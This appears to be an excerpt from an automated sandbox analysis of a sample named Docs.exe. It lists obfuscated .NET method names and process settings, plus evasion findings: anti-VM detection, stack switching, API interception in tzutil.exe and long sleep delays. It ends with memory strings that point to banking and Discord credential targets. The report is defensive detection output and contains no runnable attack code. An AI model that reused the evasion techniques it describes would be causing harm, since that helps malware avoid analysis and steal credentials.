                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, tOvqPEEmjuKEoeJGrh.csHigh entropy of concatenated method names: 'JEqa6lgqiC', 'wTta2avUjA', 'LWwaN0yiow', 'iLCabpbCAs', 'YYoaZk4KsH', 'u0BamdKlkf', 'TrVahpyGPH', 'hPta1jDirS', 'IhvaxmfhTW', 'BtMaC2GKqu'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Sujubw793b4CV83kcR.csHigh entropy of concatenated method names: 'g2Ug53IkKb', 'a2QgWEN9Au', 'KsAg05UJEV', 'JhTgVcbOJB', 'G44go1nQZT', 'k0ygGAnUVi', 'igYgdZ2s3w', 'vX6gMISCYi', 'gwjgEbnvF7', 'X08gc3bR3w'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, hgyZIKVeIJNN9ZrHUA.csHigh entropy of concatenated method names: 'dfhQSXDLYT', 'QlRQ68vU89', 'PLDQNojrQ7', 'wxeQb4Riae', 'HhEQmPWOuK', 'XpRQhGbPcW', 'uVeQxLNrfj', 'zpWQCixKwX', 'FLpSkfWJN9C3QEcGutU', 'OLrdkJWBVJtupJK2gZA'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, C1IPTFCEHvZa9pRlnZ.csHigh entropy of concatenated method names: 'ddUvZ9f4DD', 'g1gvhjZLrn', 'uT6y0YPdFw', 'anLyVvtY90', 'EDcyoeVTb9', 'tTHyG1A19K', 'rhAydtDJlx', 'd5IyMV9PoG', 'AwmyEFnKs7', 'XcgycZsYG9'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, egIQWQ8OKY337c9e9S.csHigh entropy of concatenated method names: 'LiRqDQOxT6', 'ESRqnbIqyq', 'QMSTXq4PqG', 'KoOT4Q79xn', 'y9UqItn9SJ', 'H7mqR9pQxy', 'OBIqOPUGja', 'SmNqJupQVo', 'Oxuqf7NwZa', 'rqRqrQaIBe'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Y35Cx9OYpHrOYEfs3N.csHigh entropy of concatenated method names: 'darH1VuPVx', 'XGBHxqTwhD', 'V4cH5J9pbq', 'sbRHW9Yw3h', 'Vd8HVQRu4V', 'KrCHo35ORB', 'Pa5HdxtQTM', 'j3VHMQmMEm', 'pIdHcZ7t7X', 'QL8HICC1yn'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DyBRVnWCkS3sfssM8d.csHigh entropy of concatenated method names: 'Tnt5m6WErnPUsuAkGBX', 'IGxwdpWKyqVGxAib9gB', 'nZIQTm0cy7', 'yS4QgfxeIv', 'McJQ3fRAK6', 'JCBm1oWi302UoxDJK4i', 'aLL8WDW84ZyEdMPM7Xq'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, jR2R7BJ0a3k5qxgrZd.csHigh entropy of concatenated method names: 'eGbPcAOIuu', 'cExPRMdCFW', 'Y6XPJY9Wr4', 'pRhPfh1auO', 'TEkPWmpfOA', 'adXP0sLGS1', 'CijPVIl12Z', 'pgyPoq2C1m', 'BNOPGWlrcQ', 'Cf9PdfRk3U'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, gXsdM84XaNM053sls3C.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dkl3I2VPKn', 'Bvl3R17K7G', 'EVl3OPMUq0', 'kaT3JuGTBR', 'mXN3fmSJuS', 'poV3rw6lyZ', 'OBf3sDGKIa'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, RjV69s4K3dZ4p3mjswP.csHigh entropy of concatenated method names: 'ToString', 'qy1A1ieOcy', 'rgsAxHhZnu', 'LHZACM7drW', 'VBuA5EkflJ', 'JhkAW3CSWN', 'hUaA0dpFtg', 'K8aAVVr38o', 'Hjclc1gAt8DMRnT1A0g', 'xVkmehgZGAOqeWwsFbs'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, I294WndGVmGcV2xvE1.csHigh entropy of concatenated method names: 'SxKaUEbKNu', 'EfLay1yATR', 'XuNaQCfYry', 'bZfQnnZl57', 'ht2Qz9fjpv', 'NRLaXZHLYK', 'HcBa49lDhf', 'JcFaKUZg0f', 'cIxaeBw9s5', 'irRapnNqof'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Wi0e1X4p3B67GEvWq98.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BAojgJKHpK', 'cepj3cI33J', 'QMajAygGZq', 'FvTjjnCxmL', 'A4ujFnVC2R', 'rUBjBeE8aG', 'I9FjSjoMOO'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, bhk2gfrQ8DKaScaBSL.csHigh entropy of concatenated method names: 'ToString', 'kjEkIaicKD', 'XgRkW0RaBR', 'h1lk0N3Qm9', 'rDWkV8KlVu', 'PXekoB32kJ', 'edvkG8u8Wa', 'Havkd4AIhW', 'ehfkMeZIyq', 'rNskEH3THu'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, vKcaXEzKd6EVMZXkKA.csHigh entropy of concatenated method names: 'Y9x3mQXk1c', 'w1b31YBc3N', 'oZr3xAipaa', 'DaC35nFeqJ', 'eCx3W5yRRw', 'wfb3VOUhgb', 'Ihr3oX5HGg', 'kF53SBtGno', 'alG363Tu9F', 'HoL32mlgdi'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, ej2WBepmPRd977KRGm.csHigh entropy of concatenated method names: 'tyh4aQWwse', 'aRy49ErqWj', 'HUB4w4wsQq', 'Fri4LZh1IP', 'eRl4PnZjt9', 'ufV4kjnhdO', 'WiX8q698a8POu3rFWf', 'VREd3d6WpcwaEJjqlV', 'ISW44ZRS0N', 'UTR4eix92Z'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, stvaqRtRpkYPYGu0eV.csHigh entropy of concatenated method names: 'XjEgPh3wjC', 'AB4gquh1qb', 'ED3ggEbjhU', 'ToRgAQ8yy1', 'TVfgF7xYMn', 'l8jgSfmkHh', 'Dispose', 'KyDTUO27TB', 'Qd0TYrxx2O', 'LviTy9XUyY'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DQWwse1XRyErqWj6ZE.csHigh entropy of concatenated method names: 'LAgYJjJK4P', 'deuYfxG7Dt', 'Vy0YrDy1X4', 'YBxYs7NJHF', 'TqdYi7AnyW', 'PEsY8Q8MN6', 'rcFYtuKUnl', 'T0IYD0V8gD', 'A8wY7LEYwF', 'xfGYnNWfVO'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, rrmpTWxUB4wsQqCriZ.csHigh entropy of concatenated method names: 'lHiybldHpx', 'ybfymv92hd', 'NNLy1IuZjJ', 'H8Yyxru5q0', 'cKHyPYvscP', 'T1sykXB8ck', 'nBXyqB3HI9', 'c9myTkmiYL', 'liKygvFjcl', 'nIWy35aV7a'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, ut9jfV5jnhdOqEXUkq.csHigh entropy of concatenated method names: 'KAeQl7JhWb', 'VjyQYFTAdb', 'mt4Qv2CMid', 'M3CQai3cV8', 'm4fQ9e8NaU', 'ymfvij2neZ', 'ukIv8qvOCs', 'Ennvt6cwxJ', 'WpNvDQD6iF', 'gUPv7x4v5q'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, qGDA8tYsTQcsyIAOB9.csHigh entropy of concatenated method names: 'Dispose', 'pYP47YGu0e', 'JJkKWLoXhc', 'rChQkPlPVE', 'IMV4nLHdw7', 'dy14zbyXVK', 'ProcessDialogKey', 'qxfKXujubw', 'k3bK44CV83', 'pcRKK07BQi'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, H7BQifnMkba7whuNJf.csHigh entropy of concatenated method names: 'Ora3y9gVoy', 'uhQ3vWEZaX', 'KCU3QMX5g3', 'W2k3aRT6cH', 'W6e3g4F4ew', 'Nwq39LIjGY', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.csHigh entropy of concatenated method names: 'mSuelvTp9k', 'awDeUcoI1W', 'CoJeY6h9sG', 'U6Seyl72wX', 'RGHevO80KZ', 'kRmeQyGIW9', 'FVxeaaEY1Z', 'SGHe9RDZe4', 'VK7eugIC9N', 'PrGewKwP8x'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, CrSDTGK5cAnTrMLWny.csHigh entropy of concatenated method names: 'Pg3NMLHOP', 'gEGbwpvGp', 'YcjmX8nCH', 'IoFh2VD8D', 'c4vxQW6Nj', 'dmdCkdy6G', 'cL82aXleSvyujgqNJf', 'HydH8ymZSnocg7RDTr', 'z0sTie3Eu', 'aP53ak0uD'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Eab6HZ44l66l6stFpJU.csHigh entropy of concatenated method names: 'j7H3nSBVud', 'N2T3zjCTtK', 'PYLAXU8JWw', 'MmoA44cokb', 'jAFAK5h47S', 'gX0AeLIpbt', 'webApAvW5a', 'WRgAl61nB7', 'fCgAU9Cons', 'mAqAY4f7Sk'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, xxvtRosM1rrLYeVXHi.csHigh entropy of concatenated method names: 'jiOqw8JMyn', 'nNoqLKbZ6y', 'ToString', 'pEGqUirrhS', 'Q6IqY82jM0', 'LF0qyseC1e', 'XAlqvrdGHo', 'yTvqQ9vo8p', 'V5cqaDCMqE', 'ckMq9WSMbh'
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, tOvqPEEmjuKEoeJGrh.csHigh entropy of concatenated method names: 'JEqa6lgqiC', 'wTta2avUjA', 'LWwaN0yiow', 'iLCabpbCAs', 'YYoaZk4KsH', 'u0BamdKlkf', 'TrVahpyGPH', 'hPta1jDirS', 'IhvaxmfhTW', 'BtMaC2GKqu'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Sujubw793b4CV83kcR.csHigh entropy of concatenated method names: 'g2Ug53IkKb', 'a2QgWEN9Au', 'KsAg05UJEV', 'JhTgVcbOJB', 'G44go1nQZT', 'k0ygGAnUVi', 'igYgdZ2s3w', 'vX6gMISCYi', 'gwjgEbnvF7', 'X08gc3bR3w'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, hgyZIKVeIJNN9ZrHUA.csHigh entropy of concatenated method names: 'dfhQSXDLYT', 'QlRQ68vU89', 'PLDQNojrQ7', 'wxeQb4Riae', 'HhEQmPWOuK', 'XpRQhGbPcW', 'uVeQxLNrfj', 'zpWQCixKwX', 'FLpSkfWJN9C3QEcGutU', 'OLrdkJWBVJtupJK2gZA'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, C1IPTFCEHvZa9pRlnZ.csHigh entropy of concatenated method names: 'ddUvZ9f4DD', 'g1gvhjZLrn', 'uT6y0YPdFw', 'anLyVvtY90', 'EDcyoeVTb9', 'tTHyG1A19K', 'rhAydtDJlx', 'd5IyMV9PoG', 'AwmyEFnKs7', 'XcgycZsYG9'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, egIQWQ8OKY337c9e9S.csHigh entropy of concatenated method names: 'LiRqDQOxT6', 'ESRqnbIqyq', 'QMSTXq4PqG', 'KoOT4Q79xn', 'y9UqItn9SJ', 'H7mqR9pQxy', 'OBIqOPUGja', 'SmNqJupQVo', 'Oxuqf7NwZa', 'rqRqrQaIBe'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Y35Cx9OYpHrOYEfs3N.csHigh entropy of concatenated method names: 'darH1VuPVx', 'XGBHxqTwhD', 'V4cH5J9pbq', 'sbRHW9Yw3h', 'Vd8HVQRu4V', 'KrCHo35ORB', 'Pa5HdxtQTM', 'j3VHMQmMEm', 'pIdHcZ7t7X', 'QL8HICC1yn'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DyBRVnWCkS3sfssM8d.csHigh entropy of concatenated method names: 'Tnt5m6WErnPUsuAkGBX', 'IGxwdpWKyqVGxAib9gB', 'nZIQTm0cy7', 'yS4QgfxeIv', 'McJQ3fRAK6', 'JCBm1oWi302UoxDJK4i', 'aLL8WDW84ZyEdMPM7Xq'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, jR2R7BJ0a3k5qxgrZd.csHigh entropy of concatenated method names: 'eGbPcAOIuu', 'cExPRMdCFW', 'Y6XPJY9Wr4', 'pRhPfh1auO', 'TEkPWmpfOA', 'adXP0sLGS1', 'CijPVIl12Z', 'pgyPoq2C1m', 'BNOPGWlrcQ', 'Cf9PdfRk3U'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, gXsdM84XaNM053sls3C.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dkl3I2VPKn', 'Bvl3R17K7G', 'EVl3OPMUq0', 'kaT3JuGTBR', 'mXN3fmSJuS', 'poV3rw6lyZ', 'OBf3sDGKIa'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, RjV69s4K3dZ4p3mjswP.csHigh entropy of concatenated method names: 'ToString', 'qy1A1ieOcy', 'rgsAxHhZnu', 'LHZACM7drW', 'VBuA5EkflJ', 'JhkAW3CSWN', 'hUaA0dpFtg', 'K8aAVVr38o', 'Hjclc1gAt8DMRnT1A0g', 'xVkmehgZGAOqeWwsFbs'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, I294WndGVmGcV2xvE1.csHigh entropy of concatenated method names: 'SxKaUEbKNu', 'EfLay1yATR', 'XuNaQCfYry', 'bZfQnnZl57', 'ht2Qz9fjpv', 'NRLaXZHLYK', 'HcBa49lDhf', 'JcFaKUZg0f', 'cIxaeBw9s5', 'irRapnNqof'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Wi0e1X4p3B67GEvWq98.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BAojgJKHpK', 'cepj3cI33J', 'QMajAygGZq', 'FvTjjnCxmL', 'A4ujFnVC2R', 'rUBjBeE8aG', 'I9FjSjoMOO'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, bhk2gfrQ8DKaScaBSL.csHigh entropy of concatenated method names: 'ToString', 'kjEkIaicKD', 'XgRkW0RaBR', 'h1lk0N3Qm9', 'rDWkV8KlVu', 'PXekoB32kJ', 'edvkG8u8Wa', 'Havkd4AIhW', 'ehfkMeZIyq', 'rNskEH3THu'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, vKcaXEzKd6EVMZXkKA.csHigh entropy of concatenated method names: 'Y9x3mQXk1c', 'w1b31YBc3N', 'oZr3xAipaa', 'DaC35nFeqJ', 'eCx3W5yRRw', 'wfb3VOUhgb', 'Ihr3oX5HGg', 'kF53SBtGno', 'alG363Tu9F', 'HoL32mlgdi'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, ej2WBepmPRd977KRGm.csHigh entropy of concatenated method names: 'tyh4aQWwse', 'aRy49ErqWj', 'HUB4w4wsQq', 'Fri4LZh1IP', 'eRl4PnZjt9', 'ufV4kjnhdO', 'WiX8q698a8POu3rFWf', 'VREd3d6WpcwaEJjqlV', 'ISW44ZRS0N', 'UTR4eix92Z'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, stvaqRtRpkYPYGu0eV.csHigh entropy of concatenated method names: 'XjEgPh3wjC', 'AB4gquh1qb', 'ED3ggEbjhU', 'ToRgAQ8yy1', 'TVfgF7xYMn', 'l8jgSfmkHh', 'Dispose', 'KyDTUO27TB', 'Qd0TYrxx2O', 'LviTy9XUyY'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DQWwse1XRyErqWj6ZE.csHigh entropy of concatenated method names: 'LAgYJjJK4P', 'deuYfxG7Dt', 'Vy0YrDy1X4', 'YBxYs7NJHF', 'TqdYi7AnyW', 'PEsY8Q8MN6', 'rcFYtuKUnl', 'T0IYD0V8gD', 'A8wY7LEYwF', 'xfGYnNWfVO'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, rrmpTWxUB4wsQqCriZ.csHigh entropy of concatenated method names: 'lHiybldHpx', 'ybfymv92hd', 'NNLy1IuZjJ', 'H8Yyxru5q0', 'cKHyPYvscP', 'T1sykXB8ck', 'nBXyqB3HI9', 'c9myTkmiYL', 'liKygvFjcl', 'nIWy35aV7a'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, ut9jfV5jnhdOqEXUkq.csHigh entropy of concatenated method names: 'KAeQl7JhWb', 'VjyQYFTAdb', 'mt4Qv2CMid', 'M3CQai3cV8', 'm4fQ9e8NaU', 'ymfvij2neZ', 'ukIv8qvOCs', 'Ennvt6cwxJ', 'WpNvDQD6iF', 'gUPv7x4v5q'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, qGDA8tYsTQcsyIAOB9.csHigh entropy of concatenated method names: 'Dispose', 'pYP47YGu0e', 'JJkKWLoXhc', 'rChQkPlPVE', 'IMV4nLHdw7', 'dy14zbyXVK', 'ProcessDialogKey', 'qxfKXujubw', 'k3bK44CV83', 'pcRKK07BQi'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, H7BQifnMkba7whuNJf.csHigh entropy of concatenated method names: 'Ora3y9gVoy', 'uhQ3vWEZaX', 'KCU3QMX5g3', 'W2k3aRT6cH', 'W6e3g4F4ew', 'Nwq39LIjGY', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.csHigh entropy of concatenated method names: 'mSuelvTp9k', 'awDeUcoI1W', 'CoJeY6h9sG', 'U6Seyl72wX', 'RGHevO80KZ', 'kRmeQyGIW9', 'FVxeaaEY1Z', 'SGHe9RDZe4', 'VK7eugIC9N', 'PrGewKwP8x'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, CrSDTGK5cAnTrMLWny.csHigh entropy of concatenated method names: 'Pg3NMLHOP', 'gEGbwpvGp', 'YcjmX8nCH', 'IoFh2VD8D', 'c4vxQW6Nj', 'dmdCkdy6G', 'cL82aXleSvyujgqNJf', 'HydH8ymZSnocg7RDTr', 'z0sTie3Eu', 'aP53ak0uD'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Eab6HZ44l66l6stFpJU.csHigh entropy of concatenated method names: 'j7H3nSBVud', 'N2T3zjCTtK', 'PYLAXU8JWw', 'MmoA44cokb', 'jAFAK5h47S', 'gX0AeLIpbt', 'webApAvW5a', 'WRgAl61nB7', 'fCgAU9Cons', 'mAqAY4f7Sk'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, xxvtRosM1rrLYeVXHi.csHigh entropy of concatenated method names: 'jiOqw8JMyn', 'nNoqLKbZ6y', 'ToString', 'pEGqUirrhS', 'Q6IqY82jM0', 'LF0qyseC1e', 'XAlqvrdGHo', 'yTvqQ9vo8p', 'V5cqaDCMqE', 'ckMq9WSMbh'
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Docs.exe PID: 5316, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: 4AC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: 8D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: 9D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: 9F40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: AF40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E096E rdtsc 3_2_015E096E
                      Source: C:\Users\user\Desktop\Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeWindow / User API: threadDelayed 2565Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeWindow / User API: threadDelayed 7407Jump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\Docs.exe TID: 5260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444Thread sleep count: 2565 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444Thread sleep time: -5130000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444Thread sleep count: 7407 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444Thread sleep time: -14814000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0321C9D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C9D0
                      Source: C:\Users\user\Desktop\Docs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: UQ63g7r-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: UQ63g7r-.7.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: UQ63g7r-.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: global block list test formVMware20,11696428655
